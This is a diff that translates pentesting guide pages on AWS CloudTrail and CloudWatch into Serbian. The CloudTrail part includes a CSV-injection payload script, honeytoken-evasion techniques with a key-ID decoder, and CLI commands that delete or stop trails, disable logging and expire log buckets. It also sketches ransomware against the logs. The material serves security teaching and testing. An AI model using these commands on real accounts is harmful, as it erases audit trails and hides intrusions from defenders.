-
 ### Logs to CloudWatch
 
-**CloudTrail can automatically send logs to CloudWatch so you can set alerts that warns you when suspicious activities are performed.**\
-Note that in order to allow CloudTrail to send the logs to CloudWatch a **role** needs to be created that allows that action. If possible, it's recommended to use AWS default role to perform these actions. This role will allow CloudTrail to:
+**CloudTrail može automatski slati logove u CloudWatch kako biste mogli postaviti upozorenja koja vas obaveštavaju kada se izvrše sumnjive aktivnosti.**\
+Napomena: da bi CloudTrail mogao slati logove u CloudWatch, potrebno je kreirati **ulogu** koja omogućava tu akciju. Ako je moguće, preporučuje se korišćenje AWS podrazumevane uloge za izvršavanje ovih akcija. Ova uloga će omogućiti CloudTrail-u da:
 
-- CreateLogStream: This allows to create a CloudWatch Logs log streams
-- PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream
+- CreateLogStream: Ovo omogućava kreiranje CloudWatch Logs log stream-ova
+- PutLogEvents: Dostavlja CloudTrail logove u CloudWatch Logs log stream
 
 ### Event History
 
-CloudTrail Event History allows you to inspect in a table the logs that have been recorded:
+CloudTrail Event History omogućava vam da pregledate u tabeli logove koji su zabeleženi:
 
 ![](<../../../../images/image (89).png>)
 
 ### Insights
 
-**CloudTrail Insights** automatically **analyzes** write management events from CloudTrail trails and **alerts** you to **unusual activity**. For example, if there is an increase in `TerminateInstance` events that differs from established baselines, you’ll see it as an Insight event. These events make **finding and responding to unusual API activity easier** than ever.
+**CloudTrail Insights** automatski **analizira** događaje upravljanja pisanjem iz CloudTrail tragova i **upozorava** vas na **neobične aktivnosti**. Na primer, ako dođe do povećanja `TerminateInstance` događaja koji se razlikuje od utvrđenih osnovica, videćete to kao Insight događaj. Ovi događaji olakšavaju **pronalazak i reagovanje na neobične API aktivnosti** kao nikada pre.
 
-The insights are stored in the same bucket as the CloudTrail logs in: `BucketName/AWSLogs/AccountID/CloudTrail-Insight`
+Uvidi se čuvaju u istom bucket-u kao CloudTrail logovi u: `BucketName/AWSLogs/AccountID/CloudTrail-Insight`
 
 ### Security
 
-| CloudTrail Log File Integrity        | 
  • Validate if logs have been tampered with (modified or deleted)
  • Uses digest files (create hash for each file)
    • SHA-256 hashing
    • SHA-256 with RSA for digital signing
    • private key owned by Amazon
  • Takes 1 hour to create a digest file (done on the hour every hour)
 |
+| CloudTrail Log File Integrity        | 
  • Proverite da li su logovi menjani (modifikovani ili obrisani)
  • Koristi digest fajlove (kreira hash za svaki fajl)
    • SHA-256 hashing
    • SHA-256 sa RSA za digitalno potpisivanje
    • privatni ključ u vlasništvu Amazona
  • Traje 1 sat da se kreira digest fajl (radi se svake pune sate)
 |
 | ------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
-| Stop unauthorized access             | 
  • Use IAM policies and S3 bucket policies
    • security team —> admin access
    • auditors —> read only access
  • Use SSE-S3/SSE-KMS to encrypt the logs
                                                                                                                                        |
-| Prevent log files from being deleted | 
  • Restrict delete access with IAM and bucket policies
  • Configure S3 MFA delete
  • Validate with Log File Validation
                                                                                                                                                                                            |
+| Stop unauthorized access             | 
  • Koristite IAM politike i S3 bucket politike
    • bezbednosni tim —> admin pristup
    • auditori —> samo za čitanje
  • Koristite SSE-S3/SSE-KMS za enkripciju logova
                                                                                                                                        |
+| Prevent log files from being deleted | 
  • Ograničite pristup brisanju sa IAM i bucket politikama
  • Konfigurišite S3 MFA brisanje
  • Proverite sa Log File Validation
                                                                                                                                                                                            |
 
 ## Access Advisor
 
-AWS Access Advisor relies on last 400 days AWS **CloudTrail logs to gather its insights**. CloudTrail captures a history of AWS API calls and related events made in an AWS account. Access Advisor utilizes this data to **show when services were last accessed**. By analyzing CloudTrail logs, Access Advisor can determine which AWS services an IAM user or role has accessed and when that access occurred. This helps AWS administrators make informed decisions about **refining permissions**, as they can identify services that haven't been accessed for extended periods and potentially reduce overly broad permissions based on real usage patterns.
+AWS Access Advisor se oslanja na poslednjih 400 dana AWS **CloudTrail logova za prikupljanje svojih uvida**. CloudTrail beleži istoriju AWS API poziva i povezanih događaja izvršenih u AWS nalogu. Access Advisor koristi ove podatke da **prikaže kada su usluge poslednji put korišćene**. Analizom CloudTrail logova, Access Advisor može odrediti koje AWS usluge je IAM korisnik ili uloga koristila i kada je taj pristup izvršen. Ovo pomaže AWS administratorima da donesu informisane odluke o **usavršavanju dozvola**, jer mogu identifikovati usluge koje nisu korišćene duži vremenski period i potencijalno smanjiti preširoke dozvole na osnovu stvarnih obrazaca korišćenja.
 
 > [!TIP]
-> Therefore, Access Advisor informs about **the unnecessary permissions being given to users** so the admin could remove them
+> Stoga, Access Advisor obaveštava o **nepotrebnim dozvolama koje se daju korisnicima** kako bi administrator mogao da ih ukloni
 
 

 
 ## Actions
 
 ### Enumeration
-
 ```bash
 # Get trails info
 aws cloudtrail list-trails
@@ -125,125 +122,113 @@ aws cloudtrail list-event-data-stores
 aws cloudtrail list-queries --event-data-store 
 aws cloudtrail get-query-results --event-data-store  --query-id 
 ```
-
 ### **CSV Injection**
 
-It's possible to perform a CVS injection inside CloudTrail that will execute arbitrary code if the logs are exported in CSV and open with Excel.\
-The following code will generate log entry with a bad Trail name containing the payload:
-
+Moguće je izvršiti CVS injekciju unutar CloudTrail-a koja će izvršiti proizvoljan kod ako se logovi eksportuju u CSV i otvore u Excel-u.\
+Sledeći kod će generisati log unos sa lošim imenom Trail koje sadrži payload:
 ```python
 import boto3
 payload = "=cmd|'/C calc'|''"
 client = boto3.client('cloudtrail')
 response = client.create_trail(
-	Name=payload,
-	S3BucketName="random"
+Name=payload,
+S3BucketName="random"
 )
 print(response)
 ```
-
-For more information about CSV Injections check the page:
+Za više informacija o CSV injekcijama, pogledajte stranicu:
 
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/formula-injection
 {{#endref}}
 
-For more information about this specific technique check [https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/](https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/)
+Za više informacija o ovoj specifičnoj tehnici, pogledajte [https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/](https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/)
 
-## **Bypass Detection**
+## **Zaobilaženje detekcije**
 
-### HoneyTokens **bypass**
+### HoneyTokens **zaobilaženje**
 
-Honeyokens are created to **detect exfiltration of sensitive information**. In case of AWS, they are **AWS keys whose use is monitored**, if something triggers an action with that key, then someone must have stolen that key.
+Honeytokens su kreirani da **otkriju eksfiltraciju osetljivih informacija**. U slučaju AWS-a, to su **AWS ključevi čija se upotreba prati**, ako nešto pokrene akciju sa tim ključem, onda je neko morao ukrasti taj ključ.
 
-However, Honeytokens like the ones created by [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren) are either using recognizable account name or using the same AWS account ID for all their customers. Therefore, if you can get the account name and/or account ID without making Cloudtrail create any log, **you could know if the key is a honeytoken or not**.
+Međutim, Honeytokens poput onih koje kreiraju [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren) koriste prepoznatljivo ime naloga ili koriste isti AWS ID naloga za sve svoje korisnike. Stoga, ako možete dobiti ime naloga i/ili ID naloga bez da Cloudtrail kreira bilo kakav log, **možete znati da li je ključ honeytoken ili ne**.
 
-[**Pacu**](https://github.com/RhinoSecurityLabs/pacu/blob/79cd7d58f7bff5693c6ae73b30a8455df6136cca/pacu/modules/iam__detect_honeytokens/main.py#L57) has some rules to detect if a key belongs to [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren)**:**
+[**Pacu**](https://github.com/RhinoSecurityLabs/pacu/blob/79cd7d58f7bff5693c6ae73b30a8455df6136cca/pacu/modules/iam__detect_honeytokens/main.py#L57) ima neka pravila za detekciju da li ključ pripada [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren)**:**
 
-- If **`canarytokens.org`** appears in the role name or the account ID **`534261010715`** appears in the error message.
-  - Testing them more recently, they are using the account **`717712589309`** and still has the **`canarytokens.com`** string in the name.
-- If **`SpaceCrab`** appears in the role name in the error message
-- **SpaceSiren** uses **uuids** to generate usernames: `[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}`
-- If the **name looks like randomly generated**, there are high probabilities that it's a HoneyToken.
+- Ako se **`canarytokens.org`** pojavljuje u imenu uloge ili se ID naloga **`534261010715`** pojavljuje u poruci o grešci.
+- Testirajući ih nedavno, koriste nalog **`717712589309`** i još uvek ima string **`canarytokens.com`** u imenu.
+- Ako se **`SpaceCrab`** pojavljuje u imenu uloge u poruci o grešci
+- **SpaceSiren** koristi **uuids** za generisanje korisničkih imena: `[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}`
+- Ako **ime izgleda kao nasumično generisano**, postoji velika verovatnoća da je to HoneyToken.
 
-#### Get the account ID from the Key ID
-
-You can get the **Account ID** from the **encoded** inside the **access key** as [**explained here**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489) and check the account ID with your list of Honeytokens AWS accounts:
+#### Dobijanje ID naloga iz ID ključa
 
+Možete dobiti **ID naloga** iz **kodiranog** unutar **pristupnog ključa** kao [**objašnjeno ovde**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489) i proveriti ID naloga sa vašom listom Honeytokens AWS naloga:
 ```python
 import base64
 import binascii
 
 def AWSAccount_from_AWSKeyID(AWSKeyID):
 
-    trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix
-    x = base64.b32decode(trimmed_AWSKeyID) #base32 decode
-    y = x[0:6]
+trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix
+x = base64.b32decode(trimmed_AWSKeyID) #base32 decode
+y = x[0:6]
 
-    z = int.from_bytes(y, byteorder='big', signed=False)
-    mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False)
+z = int.from_bytes(y, byteorder='big', signed=False)
+mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False)
 
-    e = (z & mask)>>7
-    return (e)
+e = (z & mask)>>7
+return (e)
 
 print("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML")))
 ```
-
 Check more information in the [**orginal research**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489).
 
-#### Do not generate a log
+#### Ne generiši log
 
-The most effective technique for this is actually a simple one. Just use the key you just found to access some service inside your own attackers account. This will make **CloudTrail generate a log inside YOUR OWN AWS account and not inside the victims**.
+Najefikasnija tehnika za ovo je zapravo jednostavna. Samo koristi ključ koji si upravo pronašao da pristupiš nekoj usluzi unutar svog napadačkog naloga. Ovo će **CloudTrail generisati log unutar TVOG AWS naloga, a ne unutar žrtve**.
 
-The things is that the output will show you an error indicating the account ID and the account name so **you will be able to see if it's a Honeytoken**.
+Stvar je u tome da će izlaz prikazati grešku koja ukazuje na ID naloga i ime naloga, tako da **ćeš moći da vidiš da li je to Honeytoken**.
 
-#### AWS services without logs
+#### AWS usluge bez logova
 
-In the past there were some **AWS services that doesn't send logs to CloudTrail** (find a [list here](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-unsupported-aws-services.html)). Some of those services will **respond** with an **error** containing the **ARN of the key role** if someone unauthorised (the honeytoken key) try to access it.
+U prošlosti je bilo nekih **AWS usluga koje ne šalju logove u CloudTrail** (pronađi [listu ovde](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-unsupported-aws-services.html)). Neke od tih usluga će **odgovoriti** sa **greškom** koja sadrži **ARN ključne uloge** ako neko neovlašćeno (honeytoken ključ) pokuša da pristupi.
 
-This way, an **attacker can obtain the ARN of the key without triggering any log**. In the ARN the attacker can see the **AWS account ID and the name**, it's easy to know the HoneyToken's companies accounts ID and names, so this way an attacker can identify id the token is a HoneyToken.
+Na ovaj način, **napadač može dobiti ARN ključa bez aktiviranja bilo kakvog loga**. U ARN-u napadač može videti **AWS ID naloga i ime**, lako je znati ID i imena kompanija HoneyToken-a, tako da na ovaj način napadač može identifikovati da li je token HoneyToken.
 
 ![](<../../../../images/image (93).png>)
 
 > [!CAUTION]
-> Note that all public APIs discovered to not being creating CloudTrail logs are now fixed, so maybe you need to find your own...
+> Imajte na umu da su sve javne API-jeve za koje je otkriveno da ne kreiraju CloudTrail logove sada ispravljene, tako da možda treba da pronađeš svoje...
 >
-> For more information check the [**original research**](https://rhinosecuritylabs.com/aws/aws-iam-enumeration-2-0-bypassing-cloudtrail-logging/).
+> Za više informacija proveri [**original research**](https://rhinosecuritylabs.com/aws/aws-iam-enumeration-2-0-bypassing-cloudtrail-logging/).
 
-### Accessing Third Infrastructure
+### Pristupanje trećoj infrastrukturi
 
-Certain AWS services will **spawn some infrastructure** such as **Databases** or **Kubernetes** clusters (EKS). A user **talking directly to those services** (like the Kubernetes API) **won’t use the AWS API**, so CloudTrail won’t be able to see this communication.
+Određene AWS usluge će **stvoriti neku infrastrukturu** kao što su **Baze podataka** ili **Kubernetes** klasteri (EKS). Korisnik koji **direktno komunicira sa tim uslugama** (kao što je Kubernetes API) **neće koristiti AWS API**, tako da CloudTrail neće moći da vidi ovu komunikaciju.
 
-Therefore, a user with access to EKS that has discovered the URL of the EKS API could generate a token locally and **talk to the API service directly without getting detected by Cloudtrail**.
+Stoga, korisnik sa pristupom EKS-u koji je otkrio URL EKS API-ja mogao bi lokalno generisati token i **direktno komunicirati sa API uslugom bez da bude otkriven od strane Cloudtrail-a**.
 
-More info in:
+Više informacija u:
 
 {{#ref}}
 ../../aws-post-exploitation/aws-eks-post-exploitation.md
 {{#endref}}
 
-### Modifying CloudTrail Config
-
-#### Delete trails
+### Modifikovanje CloudTrail konfiguracije
 
+#### Obriši tragove
 ```bash
 aws cloudtrail delete-trail --name [trail-name]
 ```
-
-#### Stop trails
-
+#### Zaustavite tragove
 ```bash
 aws cloudtrail stop-logging --name [trail-name]
 ```
-
-#### Disable multi-region logging
-
+#### Onemogućite logovanje u više regiona
 ```bash
 aws cloudtrail update-trail --name [trail-name] --no-is-multi-region --no-include-global-services
 ```
-
-#### Disable Logging by Event Selectors
-
+#### Onemogućite logovanje pomoću selektora događaja
 ```bash
 # Leave only the ReadOnly selector
 aws cloudtrail put-event-selectors --trail-name  --event-selectors '[{"ReadWriteType": "ReadOnly"}]' --region 
@@ -251,30 +236,27 @@ aws cloudtrail put-event-selectors --trail-name  --event-selectors '
 # Remove all selectors (stop Insights)
 aws cloudtrail put-event-selectors --trail-name  --event-selectors '[]' --region 
 ```
+U prvom primeru, jedan selektor događaja je dat kao JSON niz sa jednim objektom. `"ReadWriteType": "ReadOnly"` označava da **selektor događaja treba da hvata samo događaje za čitanje** (tako da CloudTrail uvidi **neće proveravati write** događaje, na primer).
 
-In the first example, a single event selector is provided as a JSON array with a single object. The `"ReadWriteType": "ReadOnly"` indicates that the **event selector should only capture read-only events** (so CloudTrail insights **won't be checking write** events for example).
-
-You can customize the event selector based on your specific requirements.
-
-#### Logs deletion via S3 lifecycle policy
+Možete prilagoditi selektor događaja na osnovu vaših specifičnih zahteva.
 
+#### Brisanje logova putem S3 životnog ciklusa
 ```bash
 aws s3api put-bucket-lifecycle --bucket  --lifecycle-configuration '{"Rules": [{"Status": "Enabled", "Prefix": "", "Expiration": {"Days": 7}}]}' --region 
 ```
+### Modifikovanje konfiguracije kante
 
-### Modifying Bucket Configuration
-
-- Delete the S3 bucket
-- Change bucket policy to deny any writes from the CloudTrail service
-- Add lifecycle policy to S3 bucket to delete objects
-- Disable the kms key used to encrypt the CloudTrail logs
+- Obriši S3 kantu
+- Promeni politiku kante da odbije bilo kakve upise iz CloudTrail servisa
+- Dodaj politiku životnog ciklusa S3 kanti da obriše objekte
+- Onemogući kms ključ koji se koristi za enkripciju CloudTrail logova
 
 ### Cloudtrail ransomware
 
 #### S3 ransomware
 
-You could **generate an asymmetric key** and make **CloudTrail encrypt the data** with that key and **delete the private key** so the CloudTrail contents cannot be recovered cannot be recovered.\
-This is basically a **S3-KMS ransomware** explained in:
+Možeš **generisati asimetrični ključ** i naterati **CloudTrail da enkriptuje podatke** tim ključem i **obrisati privatni ključ** tako da se sadržaj CloudTrail-a ne može povratiti.\
+Ovo je u suštini **S3-KMS ransomware** objašnjeno u:
 
 {{#ref}}
 ../../aws-post-exploitation/aws-s3-post-exploitation.md
@@ -282,18 +264,14 @@ This is basically a **S3-KMS ransomware** explained in:
 
 **KMS ransomware**
 
-This is an easiest way to perform the previous attack with different permissions requirements:
+Ovo je najlakši način da se izvede prethodni napad sa različitim zahtevima za dozvole:
 
 {{#ref}}
 ../../aws-post-exploitation/aws-kms-post-exploitation.md
 {{#endref}}
 
-## **References**
+## **Reference**
 
 - [https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory](https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md
index 0c790b881..6ef7aaf1c 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md
@@ -4,143 +4,142 @@
 
 ## CloudWatch
 
-**CloudWatch** **collects** monitoring and operational **data** in the form of logs/metrics/events providing a **unified view of AWS resources**, applications and services.\
-CloudWatch Log Event have a **size limitation of 256KB on each log line**.\
-It can set **high resolution alarms**, visualize **logs** and **metrics** side by side, take automated actions, troubleshoot issues, and discover insights to optimize applications.
+**CloudWatch** **prikuplja** podatke o nadzoru i operacijama u obliku logova/metrika/događaja pružajući **ujedinjeni pregled AWS resursa**, aplikacija i usluga.\
+CloudWatch Log Event ima **ograničenje veličine od 256KB po svakoj log liniji**.\
+Može postaviti **alarme visoke rezolucije**, vizualizovati **logove** i **metrike** jedan pored drugog, preduzeti automatske akcije, rešavati probleme i otkrivati uvide za optimizaciju aplikacija.
 
-You can monitor for example logs from CloudTrail. Events that are monitored:
+Možete nadgledati, na primer, logove iz CloudTraila. Događaji koji se nadgledaju:
 
-- Changes to Security Groups and NACLs
-- Starting, Stopping, rebooting and terminating EC2 instances
-- Changes to Security Policies within IAM and S3
-- Failed login attempts to the AWS Management Console
-- API calls that resulted in failed authorization
-- Filters to search in cloudwatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html)
+- Promene u sigurnosnim grupama i NACL-ima
+- Pokretanje, zaustavljanje, ponovo pokretanje i gašenje EC2 instanci
+- Promene u sigurnosnim politikama unutar IAM i S3
+- Neuspešni pokušaji prijave na AWS Management Console
+- API pozivi koji su rezultirali neuspešnom autorizacijom
+- Filteri za pretragu u cloudwatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html)
 
-## Key concepts
+## Ključni koncepti
 
 ### Namespaces
 
-A namespace is a container for CloudWatch metrics. It helps to categorize and isolate metrics, making it easier to manage and analyze them.
+Namespace je kontejner za CloudWatch metrike. Pomaže u kategorizaciji i izolaciji metrika, olakšavajući njihovo upravljanje i analizu.
 
-- **Examples**: AWS/EC2 for EC2-related metrics, AWS/RDS for RDS metrics.
+- **Primeri**: AWS/EC2 za EC2 povezane metrike, AWS/RDS za RDS metrike.
 
-### Metrics
+### Metrike
 
-Metrics are data points collected over time that represent the performance or utilization of AWS resources. Metrics can be collected from AWS services, custom applications, or third-party integrations.
+Metrike su podaci prikupljeni tokom vremena koji predstavljaju performanse ili korišćenje AWS resursa. Metrike se mogu prikupljati iz AWS usluga, prilagođenih aplikacija ili integracija trećih strana.
 
-- **Example**: CPUUtilization, NetworkIn, DiskReadOps.
+- **Primer**: CPUUtilization, NetworkIn, DiskReadOps.
 
-### Dimensions
+### Dimenzije
 
-Dimensions are key-value pairs that are part of metrics. They help to uniquely identify a metric and provide additional context, being 30 the most number of dimensions that can be associated with a metric. Dimensions also allow to filter and aggregate metrics based on specific attributes.
+Dimenzije su parovi ključ-vrednost koji su deo metrika. Pomažu da se jedinstveno identifikuje metrika i pružaju dodatni kontekst, pri čemu je 30 maksimalan broj dimenzija koje se mogu povezati sa metrikom. Dimenzije takođe omogućavaju filtriranje i agregaciju metrika na osnovu specifičnih atributa.
 
-- **Example**: For EC2 instances, dimensions might include InstanceId, InstanceType, and AvailabilityZone.
+- **Primer**: Za EC2 instance, dimenzije mogu uključivati InstanceId, InstanceType i AvailabilityZone.
 
-### Statistics
+### Statistika
 
-Statistics are mathematical calculations performed on metric data to summarize it over time. Common statistics include Average, Sum, Minimum, Maximum, and SampleCount.
+Statistika su matematičke kalkulacije izvršene na podacima metrika kako bi ih sažele tokom vremena. Uobičajene statistike uključuju Prosečno, Zbir, Minimum, Maksimum i Broj uzoraka.
 
-- **Example**: Calculating the average CPU utilization over a period of one hour.
+- **Primer**: Izračunavanje prosečne CPU upotrebe tokom perioda od jednog sata.
 
-### Units
+### Jedinice
 
-Units are the measurement type associated with a metric. Units help to provide context and meaning to the metric data. Common units include Percent, Bytes, Seconds, Count.
+Jedinice su tip merenja povezan sa metrikom. Jedinice pomažu da se pruži kontekst i značenje podacima metrika. Uobičajene jedinice uključuju Procente, Bajte, Sekunde, Broj.
 
-- **Example**: CPUUtilization might be measured in Percent, while NetworkIn might be measured in Bytes.
+- **Primer**: CPUUtilization može biti meren u Procentima, dok NetworkIn može biti meren u Bajtima.
 
-## CloudWatch Features
+## CloudWatch Karakteristike
 
 ### Dashboard
 
-**CloudWatch Dashboards** provide customizable **views of your AWS CloudWatch metrics**. It is possible to create and configure dashboards to visualize data and monitor resources in a single view, combining different metrics from various AWS services.
+**CloudWatch Dashboards** pružaju prilagodljive **poglede na vaše AWS CloudWatch metrike**. Moguće je kreirati i konfigurisati dashboarde za vizualizaciju podataka i nadgledanje resursa u jednom pogledu, kombinujući različite metrike iz raznih AWS usluga.
 
-**Key Features**:
+**Ključne Karakteristike**:
 
-- **Widgets**: Building blocks of dashboards, including graphs, text, alarms, and more.
-- **Customization**: Layout and content can be customized to fit specific monitoring needs.
+- **Widgeti**: Građevinski blokovi dashboarda, uključujući grafike, tekst, alarme i još mnogo toga.
+- **Prilagođavanje**: Raspored i sadržaj mogu se prilagoditi kako bi odgovarali specifičnim potrebama nadzora.
 
-**Example Use Case**:
+**Primer Upotrebe**:
 
-- A single dashboard showing key metrics for your entire AWS environment, including EC2 instances, RDS databases, and S3 buckets.
+- Jedan dashboard koji prikazuje ključne metrike za celo vaše AWS okruženje, uključujući EC2 instance, RDS baze podataka i S3 kante.
 
-### Metric Stream and Metric Data
+### Metric Stream i Metric Data
 
-**Metric Streams** in AWS CloudWatch enable you to continuously stream CloudWatch metrics to a destination of your choice in near real-time. This is particularly useful for advanced monitoring, analytics, and custom dashboards using tools outside of AWS.
+**Metric Streams** u AWS CloudWatch omogućavaju vam da kontinuirano strimujete CloudWatch metrike na odredište po vašem izboru u skoro realnom vremenu. Ovo je posebno korisno za napredni nadzor, analitiku i prilagođene dashboarde koristeći alate van AWS-a.
 
-**Metric Data** inside Metric Streams refers to the actual measurements or data points that are being streamed. These data points represent various metrics like CPU utilization, memory usage, etc., for AWS resources.
+**Metric Data** unutar Metric Streams se odnosi na stvarna merenja ili podatke koji se strimuju. Ovi podaci predstavljaju različite metrike kao što su CPU upotreba, korišćenje memorije itd., za AWS resurse.
 
-**Example Use Case**:
+**Primer Upotrebe**:
 
-- Sending real-time metrics to a third-party monitoring service for advanced analysis.
-- Archiving metrics in an Amazon S3 bucket for long-term storage and compliance.
+- Slanje real-time metrika trećoj strani za naprednu analizu.
+- Arhiviranje metrika u Amazon S3 kanti za dugoročno skladištenje i usklađenost.
 
 ### Alarm
 
-**CloudWatch Alarms** monitor your metrics and perform actions based on predefined thresholds. When a metric breaches a threshold, the alarm can perform one or more actions such as sending notifications via SNS, triggering an auto-scaling policy, or running an AWS Lambda function.
+**CloudWatch Alarms** nadgledaju vaše metrike i preduzimaju akcije na osnovu unapred definisanih pragova. Kada metrika prekorači prag, alarm može izvršiti jednu ili više akcija kao što su slanje obaveštenja putem SNS-a, pokretanje politike automatskog skaliranja ili pokretanje AWS Lambda funkcije.
 
-**Key Components**:
+**Ključne Komponente**:
 
-- **Threshold**: The value at which the alarm triggers.
-- **Evaluation Periods**: The number of periods over which data is evaluated.
-- **Datapoints to Alarm**: The number of periods with a reached threshold needed to trigger the alarm
-- **Actions**: What happens when an alarm state is triggered (e.g., notify via SNS).
+- **Prag**: Vrednost na kojoj se alarm aktivira.
+- **Periodi Evaluacije**: Broj perioda tokom kojih se podaci evaluiraju.
+- **Podaci za Alarm**: Broj perioda sa dostignutim pragom potreban za aktiviranje alarma.
+- **Akcije**: Šta se dešava kada se stanje alarma aktivira (npr. obaveštavanje putem SNS-a).
 
-**Example Use Case**:
+**Primer Upotrebe**:
 
-- Monitoring EC2 instance CPU utilization and sending a notification via SNS if it exceeds 80% for 5 consecutive minutes.
+- Nadgledanje CPU upotrebe EC2 instance i slanje obaveštenja putem SNS-a ako premaši 80% tokom 5 uzastopnih minuta.
 
-### Anomaly Detectors
+### Detektori Anomalija
 
-**Anomaly Detectors** use machine learning to automatically detect anomalies in your metrics. You can apply anomaly detection to any CloudWatch metric to identify deviations from normal patterns that might indicate issues.
+**Detektori Anomalija** koriste mašinsko učenje za automatsko otkrivanje anomalija u vašim metrikama. Možete primeniti detekciju anomalija na bilo koju CloudWatch metriku kako biste identifikovali odstupanja od normalnih obrazaca koja mogu ukazivati na probleme.
 
-**Key Components**:
+**Ključne Komponente**:
 
-- **Model Training**: CloudWatch uses historical data to train a model and establish what normal behavior looks like.
-- **Anomaly Detection Band**: A visual representation of the expected range of values for a metric.
+- **Obuka Modela**: CloudWatch koristi istorijske podatke za obuku modela i utvrđivanje kako izgleda normalno ponašanje.
+- **Opseg Detekcije Anomalija**: Vizuelna reprezentacija očekivanog opsega vrednosti za metriku.
 
-**Example Use Case**:
+**Primer Upotrebe**:
 
-- Detecting unusual CPU utilization patterns in an EC2 instance that might indicate a security breach or application issue.
+- Otkrivanje neobičnih obrazaca CPU upotrebe u EC2 instanci koji mogu ukazivati na bezbednosni proboj ili problem sa aplikacijom.
 
-### Insight Rules and Managed Insight Rules
+### Insight Pravila i Upravljana Insight Pravila
 
-**Insight Rules** allow you to identify trends, detect spikes, or other patterns of interest in your metric data using **powerful mathematical expressions** to define the conditions under which actions should be taken. These rules can help you identify anomalies or unusual behaviors in your resource performance and utilization.
+**Insight Pravila** omogućavaju vam da identifikujete trendove, detektujete skokove ili druge obrasce od interesa u vašim podacima metrika koristeći **moćne matematičke izraze** za definisanje uslova pod kojima bi se akcije trebale preduzeti. Ova pravila mogu vam pomoći da identifikujete anomalije ili neobično ponašanje u performansama i korišćenju vaših resursa.
 
-**Managed Insight Rules** are pre-configured **insight rules provided by AWS**. They are designed to monitor specific AWS services or common use cases and can be enabled without needing detailed configuration.
+**Upravljana Insight Pravila** su unapred konfigurisana **insight pravila koja pruža AWS**. Dizajnirana su za nadgledanje specifičnih AWS usluga ili uobičajenih slučajeva korišćenja i mogu se omogućiti bez potrebe za detaljnom konfiguracijom.
 
-**Example Use Case**:
+**Primer Upotrebe**:
 
-- Monitoring RDS Performance: Enable a managed insight rule for Amazon RDS that monitors key performance indicators such as CPU utilization, memory usage, and disk I/O. If any of these metrics exceed safe operational thresholds, the rule can trigger an alert or automated mitigation action.
+- Nadgledanje RDS Performansi: Omogućite upravljano insight pravilo za Amazon RDS koje nadgleda ključne indikatore performansi kao što su CPU upotreba, korišćenje memorije i disk I/O. Ako bilo koja od ovih metrika premaši sigurne operativne pragove, pravilo može aktivirati upozorenje ili automatsku akciju ublažavanja.
 
-### CloudWatch Logs 
+### CloudWatch Logovi 
 
-Allows to **aggregate and monitor logs from applications** and systems from **AWS services** (including CloudTrail) and **from apps/systems** (**CloudWatch Agen**t can be installed on a host). Logs can be **stored indefinitely** (depending on the Log Group settings) and can be exported.
+Omogućava **agregaciju i nadgledanje logova iz aplikacija** i sistema iz **AWS usluga** (uključujući CloudTrail) i **iz aplikacija/sistema** (**CloudWatch Agent** može biti instaliran na hostu). Logovi se mogu **čuvati neodređeno** (u zavisnosti od podešavanja Log Grupe) i mogu se eksportovati.
 
-**Elements**:
+**Elementi**:
 
-| **Log Group**            | A **collection of log streams** that share the same retention, monitoring, and access control settings                                                     |
+| **Log Grupa**            | **Kolekcija log stream-ova** koji dele iste postavke zadržavanja, nadzora i kontrole pristupa                                                     |
 | ------------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------- |
